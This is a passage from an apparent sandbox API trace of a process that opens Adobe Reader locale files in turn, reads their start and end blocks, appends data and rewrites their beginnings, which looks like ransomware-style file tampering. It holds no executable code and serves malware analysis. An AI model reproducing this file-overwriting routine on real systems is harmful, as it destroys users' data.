nNumberOfBytesToWrite=0x1f88, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2691bb8*, lpNumberOfBytesWritten=0x2b1f2d0*=0x1f88, lpOverlapped=0x0) returned 1 [0081.071] CloseHandle (hObject=0x1fc) returned 1 [0081.071] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\ReadOutLoud.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\readoutloud.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.072] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.072] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2a00 [0081.072] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.072] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.073] ReleaseMutex (hMutex=0x168) returned 1 [0081.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.SKY", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0081.073] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ReadOutLoud.SKY", cchWideChar=15, lpMultiByteStr=0x1f732cc, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ReadOutLoud.SKY", lpUsedDefaultChar=0x0) returned 15 [0081.073] ReadFile (in: hFile=0x1fc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.083] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1a00 [0081.083] ReadFile (in: hFile=0x1fc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.089] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1a00 [0081.089] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.089] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0081.089] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.089] CloseHandle (hObject=0x1fc) returned 1 [0081.090] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sk_SK\\updater.SKY" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sk_sk\\updater.sky"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1fc [0081.090] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.090] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x2c00 [0081.090] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.091] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.091] ReleaseMutex (hMutex=0x168) returned 1 [0081.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.SKY", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.091] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="updater.SKY", cchWideChar=11, lpMultiByteStr=0x1f7340c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="updater.SKY", lpUsedDefaultChar=0x0) returned 11 [0081.091] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.277] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0081.277] ReadFile (in: hFile=0x1fc, lpBuffer=0x1e90018, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.386] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1c00 [0081.386] WriteFile (in: hFile=0x1fc, lpBuffer=0x1ea5988*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea5988*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.387] SetFilePointer (in: hFile=0x1fc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0081.387] WriteFile (in: hFile=0x1fc, lpBuffer=0x1e90018*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1e90018*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.388] CloseHandle (hObject=0x1fc) returned 1 [0081.388] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\DigSig.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\digsig.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.404] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.404] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x1e000 [0081.404] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.405] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.405] ReleaseMutex (hMutex=0x168) returned 1 [0081.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.SLV", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0081.405] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="DigSig.SLV", cchWideChar=10, lpMultiByteStr=0x1f7346c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="DigSig.SLV", lpUsedDefaultChar=0x0) returned 10 [0081.405] ReadFile (in: hFile=0x1cc, lpBuffer=0x2692de8, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.427] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1d000 [0081.427] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867358, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.443] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x1d000 [0081.444] WriteFile (in: hFile=0x1cc, lpBuffer=0x2867358*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2867358*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.444] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0081.444] WriteFile (in: hFile=0x1cc, lpBuffer=0x25a8048*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x25a8048*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.445] CloseHandle (hObject=0x1cc) returned 1 [0081.445] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\PPKLITE.SLV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\ppklite.slv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.464] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.464] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x7b800 [0081.464] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.464] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.464] ReleaseMutex (hMutex=0x168) returned 1 [0081.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.SLV", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0081.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPKLITE.SLV", cchWideChar=11, lpMultiByteStr=0x1f7366c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPKLITE.SLV", lpUsedDefaultChar=0x0) returned 11 [0081.464] ReadFile (in: hFile=0x1cc, lpBuffer=0x25a0018, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x25a0018*, lpNumberOfBytesRead=0x2b1f278*=0x8000, lpOverlapped=0x0) returned 1 [0081.505] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7a800 [0081.505] ReadFile (in: hFile=0x1cc, lpBuffer=0x2867a58, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2867a58*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.561] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x7a800 [0081.562] WriteFile (in: hFile=0x1cc, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.562] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0081.562] WriteFile (in: hFile=0x1cc, lpBuffer=0x2882db8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2882db8*, lpNumberOfBytesWritten=0x2b1f28c*=0x8000, lpOverlapped=0x0) returned 1 [0081.562] CloseHandle (hObject=0x1cc) returned 1 [0081.563] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sl_SI\\Services\\Services.asfx" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sl_si\\services\\services.asfx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.563] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.563] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0xe9 [0081.564] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.564] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.564] ReleaseMutex (hMutex=0x168) returned 1 [0081.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.564] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Services.asfx", cchWideChar=13, lpMultiByteStr=0x1f7342c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Services.asfx", lpUsedDefaultChar=0x0) returned 13 [0081.564] ReadFile (in: hFile=0x1cc, lpBuffer=0x26bf2f8, nNumberOfBytesToRead=0xe9, lpNumberOfBytesRead=0x2b1f2bc, lpOverlapped=0x0 | out: lpBuffer=0x26bf2f8*, lpNumberOfBytesRead=0x2b1f2bc*=0xe9, lpOverlapped=0x0) returned 1 [0081.565] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f300*=0) returned 0x0 [0081.565] WriteFile (in: hFile=0x1cc, lpBuffer=0x2863a48*, nNumberOfBytesToWrite=0x671, lpNumberOfBytesWritten=0x2b1f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2863a48*, lpNumberOfBytesWritten=0x2b1f2d0*=0x671, lpOverlapped=0x0) returned 1 [0081.566] CloseHandle (hObject=0x1cc) returned 1 [0081.566] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\BRdlang32.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\brdlang32.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.567] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.567] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3200 [0081.567] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.567] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.567] ReleaseMutex (hMutex=0x168) returned 1 [0081.567] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.SVE", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0081.568] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="BRdlang32.SVE", cchWideChar=13, lpMultiByteStr=0x1f7346c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="BRdlang32.SVE", lpUsedDefaultChar=0x0) returned 13 [0081.568] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.585] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2200 [0081.585] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.599] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2200 [0081.600] WriteFile (in: hFile=0x1cc, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x26698c8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.600] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0081.600] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesWritten=0x2b1f28c*=0x1000, lpOverlapped=0x0) returned 1 [0081.600] CloseHandle (hObject=0x1cc) returned 1 [0081.601] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\Multimedia.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\multimedia.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.602] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.602] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x13000 [0081.602] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.602] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.602] ReleaseMutex (hMutex=0x168) returned 1 [0081.602] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.SVE", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0081.603] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Multimedia.SVE", cchWideChar=14, lpMultiByteStr=0x1f733cc, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Multimedia.SVE", lpUsedDefaultChar=0x0) returned 14 [0081.603] ReadFile (in: hFile=0x1cc, lpBuffer=0x2863a28, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x2863a28*, lpNumberOfBytesRead=0x2b1f278*=0x4000, lpOverlapped=0x0) returned 1 [0081.618] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12000 [0081.618] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.630] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x12000 [0081.630] WriteFile (in: hFile=0x1cc, lpBuffer=0x286ef88*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x286ef88*, lpNumberOfBytesWritten=0x2b1f28c*=0x1588, lpOverlapped=0x0) returned 1 [0081.631] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f2bc*=0) returned 0x0 [0081.631] WriteFile (in: hFile=0x1cc, lpBuffer=0x2692de8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2b1f28c, lpOverlapped=0x0 | out: lpBuffer=0x2692de8*, lpNumberOfBytesWritten=0x2b1f28c*=0x4000, lpOverlapped=0x0) returned 1 [0081.631] CloseHandle (hObject=0x1cc) returned 1 [0081.632] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\Locale\\sv_SE\\SendMail.SVE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\locale\\sv_se\\sendmail.sve"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0081.632] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.632] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x3c00 [0081.632] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x2b1f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2b1f8c0*=0) returned 0x0 [0081.633] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0081.633] ReleaseMutex (hMutex=0x168) returned 1 [0081.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.SVE", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.633] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SendMail.SVE", cchWideChar=12, lpMultiByteStr=0x1f7346c, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SendMail.SVE", lpUsedDefaultChar=0x0) returned 12 [0081.633] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.647] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2c00 [0081.647] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ebf2d8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2b1f278, lpOverlapped=0x0 | out: lpBuffer=0x1ebf2d8*, lpNumberOfBytesRead=0x2b1f278*=0x1000, lpOverlapped=0x0) returned 1 [0081.653] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2b1f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2b1f2e8*=0) returned 0x2c00 [0081.653] WriteFile (in: hFile=0x1cc, lpBuffer=0x26698c8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2b1f28c, 